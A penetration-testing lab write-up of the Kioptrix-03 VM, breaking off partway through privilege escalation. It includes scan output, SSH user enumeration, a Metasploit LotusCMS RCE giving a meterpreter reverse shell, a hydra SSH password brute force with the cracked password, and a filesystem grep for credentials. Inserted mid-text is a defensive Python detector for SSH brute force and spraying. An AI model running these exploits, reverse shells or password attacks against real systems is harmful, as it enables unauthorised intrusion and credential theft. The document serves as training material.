This installment of the Kioptrix series is about credential attacks, that is, attacks on a person's identity. Credentials are needed during authentication, when someone is about to enter a system. They are also needed when someone already inside the system wants to access particular information. The information-security principle that governs credential management is "Need To Know": information is granted according to a person's responsibilities, authority and job description. Let us follow the journey of hunting for vulnerabilities on this Kioptrix-03 machine. I hope it proves useful.
Stage One: Scanning and Enumeration
As in the earlier stories, we begin our journey with nmap, a tool that has demonstrably helped Neo complete various missions in The Matrix film trilogy. According to the information gathered by nmap, this machine functions as a web server (Apache 2.2.8 and PHP) and uses SSH (OpenSSH 4.7p1) for remote administration of the server.
root@kali2:~# nmap -p- -A 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 19:43 PDT
Nmap scan report for 192.168.216.150 (192.168.216.150)
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.216.150 (192.168.216.150)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds
root@kali2:~#
With the help of nikto, dirb and Burp Suite we found quite a few files and folders on the Kioptrix-03 machine. Only three findings, however, are interesting enough to pursue further: the gallery folder, phpmyadmin, and the login form of the LotusCMS application (index.php). See the following screenshots; note that for the gallery folder to work, an entry for kioptrix3.com must be added to /etc/hosts on our Kali Linux, pointing at the machine's IP address.
root@kali2:~# dirb http://192.168.216.150
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Apr 20 19:49:35 2020
URL_BASE: http://192.168.216.150/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.216.150/ ----
==> DIRECTORY: http://192.168.216.150/cache/
==> DIRECTORY: http://192.168.216.150/core/
+ http://192.168.216.150/data (CODE:403|SIZE:326)
+ http://192.168.216.150/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.216.150/gallery/
+ http://192.168.216.150/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.216.150/modules/
==> DIRECTORY: http://192.168.216.150/phpmyadmin/
+ http://192.168.216.150/server-status (CODE:403|SIZE:335)
==> DIRECTORY: http://192.168.216.150/style/
---- Entering directory: http://192.168.216.150/cache/ ----
+ http://192.168.216.150/cache/index.html (CODE:200|SIZE:1819)
---- Entering directory: http://192.168.216.150/core/ ----
==> DIRECTORY: http://192.168.216.150/core/controller/
+ http://192.168.216.150/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.216.150/core/lib/
==> DIRECTORY: http://192.168.216.150/core/model/
==> DIRECTORY: http://192.168.216.150/core/view/
---- Entering directory: http://192.168.216.150/gallery/ ----
+ http://192.168.216.150/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://192.168.216.150/gallery/photos/
==> DIRECTORY: http://192.168.216.150/gallery/themes/
---- Entering directory: http://192.168.216.150/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/ ----
+ http://192.168.216.150/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.216.150/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://192.168.216.150/phpmyadmin/js/
==> DIRECTORY: http://192.168.216.150/phpmyadmin/lang/
+ http://192.168.216.150/phpmyadmin/libraries (CODE:403|SIZE:342)
+ http://192.168.216.150/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.216.150/phpmyadmin/scripts/
==> DIRECTORY: http://192.168.216.150/phpmyadmin/themes/
---- Entering directory: http://192.168.216.150/style/ ----
+ http://192.168.216.150/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.216.150/style/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/controller/ ----
+ http://192.168.216.150/core/controller/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/lib/ ----
+ http://192.168.216.150/core/lib/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/model/ ----
+ http://192.168.216.150/core/model/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/core/view/ ----
+ http://192.168.216.150/core/view/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.216.150/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.150/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Apr 20 19:50:05 2020
DOWNLOADED: 46120 - FOUND: 17
root@kali2:~#
root@kali2:~# nikto -h http://192.168.216.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.216.150
+ Target Hostname: 192.168.216.150
+ Target Port: 80
+ Start Time: 2020-04-20 19:51:03 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 12:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2020-04-20 19:51:36 (GMT-7) (33 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali2:~#
There is one more interesting piece of information. While browsing the gallery folder and posting a comment on the blog, we came across information suggesting that a user account named loneferret very likely exists (figure 4). Its existence still has to be verified, though.

To confirm that the loneferret account exists, we use Metasploit, specifically the auxiliary module auxiliary/scanner/ssh/ssh_enumusers. Its output is shown below.
msf5 auxiliary(scanner/ssh/ssh_enumusers) > show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_FALSE false no Check for false positives (random username)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
USERNAME loneferret no Single username to test (username spray)
USER_FILE no File containing usernames, one per line
Auxiliary action:
Name Description
---- -----------
Malformed Packet Use a malformed packet
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.216.150:22 - SSH - Using malformed packet technique
[*] 192.168.216.150:22 - SSH - Starting scan
[+] 192.168.216.150:22 - SSH - User 'loneferret' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
Based on Metasploit's verification we can conclude that the user account loneferret really exists and is worth following up on in the next stage.
As for the operating system, the Kioptrix03 server most likely runs the Ubuntu distribution with a kernel somewhere between 2.6.9 and 2.6.33. The exact Ubuntu version and the processor architecture (32- or 64-bit) are not yet known. OS identification was attempted with nmap using the -O and --osscan-guess options; the result is as follows:
root@kali2:~# nmap -O --osscan-guess 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 23:07 PDT
Nmap scan report for kioptrix3.com (192.168.216.150)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
Stage Two: Mapping the Attack Surface
Based on the information searched for, collected and verified in the previous stage, we can now map the potential vulnerabilities and opportunities for cyber attack. Figure 4 below shows that the operating system and both exposed services (HTTP and SSH) offer many attack opportunities that are worth investigating and following up.

Stage Three: Exploitation and Post-Exploitation
The tactical objective of Exploitation is to obtain a limited shell, whereas the tactical objective of Post-Exploitation is to obtain system administrator (root) privileges. Privilege escalation during Post-Exploitation is not needed, however, if administrator privileges were already obtained during Exploitation. The Kioptrix1 story is an example of exploitation that required no further privilege escalation, because it leveraged a Remote Code Execution (RCE) vulnerability.
We start by looking for possible Remote Code Execution (RCE) attack opportunities, based on the attack-surface mapping done in the previous stage.
Our search found no RCE potential in the operating system. Although there is very likely a buffer overflow vulnerability in the kernel, the available exploits are aimed at escalating privileges to root (privilege escalation), not at remote execution. No RCE potential was found in OpenSSH 4.7p1 either.
Next, within the HTTP service no RCE potential was found in phpmyadmin or in Apache. The potential turned out to lie in LotusCMS. This was verified with Metasploit, using the exploit module exploit/multi/http/lcms_php_exec. Below is the Metasploit session in which we obtain a limited shell on the Kioptrix3 server as user www-data:
root@kali2:~# msfconsole
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1066 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search lotuscms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution
msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin&page=loginSubmit
URI => /index.php?system=Admin&page=loginSubmit
msf5 exploit(multi/http/lcms_php_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 generic/custom normal No Custom Payload
2 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
5 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
6 php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl)
7 php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6
8 php/bind_php normal No PHP Command Shell, Bind TCP (via PHP)
9 php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6
10 php/download_exec normal No PHP Executable Download and Execute
11 php/exec normal No PHP Execute Command
12 php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager
13 php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6
14 php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
15 php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support
16 php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager
17 php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager
18 php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl)
19 php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP)
msf5 exploit(multi/http/lcms_php_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.216.149
LHOST => 192.168.216.149
msf5 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.216.150 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /index.php?system=Admin&page=loginSubmit yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.216.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf5 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 192.168.216.149:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.216.150
[*] Meterpreter session 1 opened (192.168.216.149:4444 -> 192.168.216.150:49752) at 2020-04-21 06:21:05 -0700
id
meterpreter >
meterpreter > id
[-] Unknown command: id.
meterpreter > id
[-] Unknown command: id.
meterpreter > shell
Process 6335 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
Kioptrix3
pwd
/home/www/kioptrix3.com
Another attack opportunity worth exploring besides RCE is a brute-force attack on the loneferret account over the SSH service. We will use hydra for online cracking, with a wordlist taken from the credential compilation SecLists at https://github.com/danielmiessler/SecLists. The hydra options we use are -l, because we target a single user, -P, because we use a wordlist for the passwords, and -t to tune the number of concurrent tasks while cracking runs. The cracking result after running hydra is as follows:
root@kali2:~# hydra -l loneferret -P ~/Tools/SecLists/Passwords/Common-Credentials/10k-most-common.txt ssh://192.168.216.150 -t 4
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-21 06:54:19
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10000 login tries (l:1/p:10000), ~2500 tries per task
[DATA] attacking ssh://192.168.216.150:22/
[STATUS] 52.00 tries/min, 52 tries in 00:01h, 9948 to do in 03:12h, 4 active
[22][ssh] host: 192.168.216.150 login: loneferret password: starwars
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-21 06:56:04
root@kali2:~#
root@kali2:~# ssh loneferret@192.168.216.150
loneferret@192.168.216.150's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$
From the hydra cracking result we obtained loneferret's password: starwars. After logging in over the SSH service we got into the Kioptrix3 server, and so we obtained a limited shell, just as we did earlier through the RCE in LotusCMS. The technique we used to attack the SSH credential is called a Password Spray Attack. This kind of attack focuses on a single credential rather than using a wordlist of many usernames that may not even be valid.
So there are two ways to obtain a limited shell during exploitation. The difference between them is that the RCE attack on LotusCMS gives us the www-data credential, whereas brute-forcing the SSH service gives us the loneferret credential. We can choose either; in this write-up we will use the second.
After logging in with loneferret's credential, we move on to Post-Exploitation to escalate our privileges to root, the system administrator. We begin by searching for sensitive information in the form of credentials using the find command: find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null. This command searches files with the *.php extension up to five sub-folder levels deep and then greps each of them for the word password. The output of the command follows.
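What the hydra run above leaves behind on the target is a burst of failed sshd logins for one account from one source, followed by a success for that same account; the Python below, added here and not part of the original write-up, shows how a defender would pick that pattern out of OpenSSH auth.log lines. The log lines are constructed (the sshd message format is real, but the timestamps, process ids, the 10.0.0.5 and 192.168.216.20 sources and the year 2020 are assumptions), and the second detector generalizes to the many-usernames variant the text contrasts with the single-account attack.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

LOG_YEAR = 2020  # syslog lines carry no year; assumed for the constructed sample

# Matches OpenSSH's "Failed/Accepted password|publickey for [invalid user] X from IP port N"
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


@dataclass
class AuthEvent:
    when: datetime
    ok: bool
    user: str
    ip: str


def parse_auth_log(text):
    """Turn raw auth.log text into AuthEvents; unrelated sshd lines are skipped."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue  # session opened/closed, disconnects, pam noise ...
        when = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append(AuthEvent(when, m["result"] == "Accepted", m["user"], m["ip"]))
    return events


def detect_ssh_bruteforce(events, threshold=6, window=timedelta(seconds=60)):
    """One (source IP, username) pair failing `threshold` times inside `window`
    is flagged; a success landing within `window` of the last failure marks the
    alert as a probable guessed password rather than a legitimate login."""
    recent = defaultdict(deque)  # (ip, user) -> failure times still inside the window
    failures = defaultdict(int)  # (ip, user) -> total failures seen
    alerts = {}
    for e in sorted(events, key=lambda ev: ev.when):
        key = (e.ip, e.user)
        if e.ok:
            alert = alerts.get(key)
            if alert and recent[key] and e.when - recent[key][-1] <= window:
                alert["success_after_burst"] = True
            continue
        failures[key] += 1
        q = recent[key]
        q.append(e.when)
        while e.when - q[0] > window:  # never empties: q[-1] is e.when itself
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(key, {"ip": e.ip, "user": e.user,
                                            "first_seen": q[0], "success_after_burst": False})
            alert["failures"] = failures[key]
            alert["last_seen"] = e.when
    return list(alerts.values())


def detect_ssh_spray(events, user_threshold=5, window=timedelta(minutes=10)):
    """The many-usernames variant: one source failing against `user_threshold`
    distinct accounts inside `window`, each account possibly only once."""
    recent = defaultdict(deque)  # ip -> (time, user) of failures inside the window
    alerts = {}
    for e in sorted(events, key=lambda ev: ev.when):
        if e.ok:
            continue
        q = recent[e.ip]
        q.append((e.when, e.user))
        while e.when - q[0][0] > window:
            q.popleft()
        users = {u for _, u in q}
        if len(users) >= user_threshold:
            alerts[e.ip] = {"ip": e.ip, "distinct_users": len(users), "last_seen": e.when}
    return list(alerts.values())


def constructed_sample():
    """Constructed auth.log: a 10-try burst on loneferret from the attacking host
    followed by a success, a 5-user spray from 10.0.0.5, and benign noise."""
    lines = [f"Apr 21 06:54:{20 + i:02d} Kioptrix3 sshd[{6401 + i}]: Failed password "
             f"for loneferret from 192.168.216.149 port {40110 + i} ssh2" for i in range(10)]
    lines.append("Apr 21 06:54:31 Kioptrix3 sshd[6415]: Accepted password for loneferret "
                 "from 192.168.216.149 port 40130 ssh2")
    lines.append("Apr 21 06:54:31 Kioptrix3 sshd[6415]: pam_unix(sshd:session): "
                 "session opened for user loneferret by (uid=0)")
    for i, user in enumerate(["admin", "test", "guest", "oracle", "backup"]):
        lines.append(f"Apr 21 07:30:{2 + i:02d} Kioptrix3 sshd[{6500 + i}]: Failed password "
                     f"for invalid user {user} from 10.0.0.5 port {5000 + i} ssh2")
    lines.append("Apr 21 09:00:00 Kioptrix3 sshd[6600]: Accepted publickey for loneferret "
                 "from 192.168.216.20 port 50000 ssh2")
    return "\n".join(lines)


SAMPLE_AUTH_LOG = constructed_sample()

if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_AUTH_LOG)
    for alert in detect_ssh_bruteforce(evs) + detect_ssh_spray(evs):
        print(alert)
```

Against a real /var/log/auth.log the only thing to change is the year and, if the host logs with a different syslog layout, the leading part of AUTH_RE.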
loneferret@Kioptrix3:~$ find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null
/usr/share/phpmyadmin/libraries/header.inc.php:101: } elseif (isset($js_to_run) && $js_to_run == 'user_password.js') {
/usr/share/phpmyadmin/libraries/header.inc.php:111: <script src="./js/user_password.js" type="text/javascript"></script>
/usr/share/phpmyadmin/libraries/common.inc.php:350: 'user_password.php',
/usr/share/phpmyadmin/libraries/common.inc.php:408: 'pma_servername', 'pma_username', 'pma_password',
/usr/share/phpmyadmin/libraries/common.inc.php:824: $cfg['Server']['password'], true);
/usr/share/phpmyadmin/libraries/common.inc.php:832: $cfg['Server']['password'], false);
/usr/share/phpmyadmin/libraries/config.default.php:58: * The 'cookie' auth_type uses blowfish algorithm to encrypt the password. If
/usr/share/phpmyadmin/libraries/config.default.php:162: * MySQL password (only needed with 'config' auth_type)
/usr/share/phpmyadmin/libraries/config.default.php:164: * @global string $cfg['Servers'][$i]['password']
/usr/share/phpmyadmin/libraries/config.default.php:166:$cfg['Servers'][$i]['password'] = '';
/usr/share/phpmyadmin/libraries/config.default.php:190: * Whether to try to connect without password
/usr/share/phpmyadmin/libraries/config.default.php:192: * @global boolean $cfg['Servers'][$i]['nopassword']
/usr/share/phpmyadmin/libraries/config.default.php:194:$cfg['Servers'][$i]['nopassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:624: * show change password link
/usr/share/phpmyadmin/libraries/config.default.php:2173: * @global string $cfg['SQLValidator']['password']
/usr/share/phpmyadmin/libraries/config.default.php:2175:$cfg['SQLValidator']['password'] = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:28: * Also set a username and password if you have a private one
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:70: // The class defaults to anonymous with an empty password
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:73: $srv->setCredentials($cfg['SQLValidator']['username'], $cfg['SQLValidator']['password']);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:46: var $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:97: function _openSession($obj, $username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:103: $use_array = array("a_userName" => $username, "a_password" => $password, "a_callingProgram" => $calling_program, "a_callingProgramVersion" => $calling_program_version, "a_targetDbms" => $target_dbms, "a_targetDbmsVersion" => $target_dbms_version, "a_connectionTechnology" => $connection_technology, "a_connectionTechnologyVersion" => $connection_technology_version, "a_interactive" => $interactive);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:107: /* $ret = $obj->openSession($username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:177: $this->password = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:195: * @param string the password
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:199: function setCredentials($username, $password)
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:202: $this->password = $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:342: $this->session_data = $this->_openSession($this->service_link, $this->username, $this->password,
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:4: * Displays form for password change
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:6: * @version $Id: display_change_password.lib.php 10796 2007-10-16 07:09:50Z cybot_tm $
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:23: <fieldset id="fieldset_change_password">
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:38: <input type="password" name="pma_pw" id="pw_pma_pw" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:41: <input type="password" name="pma_pw2" id="pw_pma_pw2" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:73: <fieldset id="fieldset_change_password_footer" class="tblFooters">
/usr/share/phpmyadmin/libraries/common.lib.php:479: // if the config password is wrong, or the MySQL server does not
/usr/share/phpmyadmin/libraries/common.lib.php:481: // username/password
/usr/share/phpmyadmin/user_password.php:5: * @version $Id: user_password.php 10501 2007-07-18 15:32:08Z lem9 $
/usr/share/phpmyadmin/user_password.php:29: * If the "change password" form has been submitted, checks for valid values
/usr/share/phpmyadmin/user_password.php:51: $err_url = 'user_password.php?' . $common_url_query;
/usr/share/phpmyadmin/user_password.php:55: $sql_query = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . preg_replace('@.@s', '*', $pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:56: $local_query = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . PMA_sqlAddslashes($pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:59: // Changes password cookie if required
/usr/share/phpmyadmin/user_password.php:60: // Duration = till the browser is closed for password (we don't want this to be saved)
/usr/share/phpmyadmin/user_password.php:87: * If the "change password" form hasn't been submitted or the values submitted
/usr/share/phpmyadmin/user_password.php:91:$js_to_run = 'user_password.js';
/usr/share/phpmyadmin/user_password.php:100:require_once './libraries/display_change_password.lib.php';
/usr/share/phpmyadmin/server_privileges.php:656: . $spaces . '<label for="select_pred_password">' . "\n"
/usr/share/phpmyadmin/server_privileges.php:660: . $spaces . ' <select name="pred_password" id="select_pred_password" title="' . $GLOBALS['strPassword'] . '"' . "\n"
/usr/share/phpmyadmin/server_privileges.php:671: . $spaces . '<input type="password" id="text_pma_pw" name="pma_pw" title="' . $GLOBALS['strPassword'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:678: . $spaces . '<input type="password" name="pma_pw2" id="text_pma_pw2" title="' . $GLOBALS['strReType'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:681: . $spaces . '<label for="button_generate_password">' . "\n"
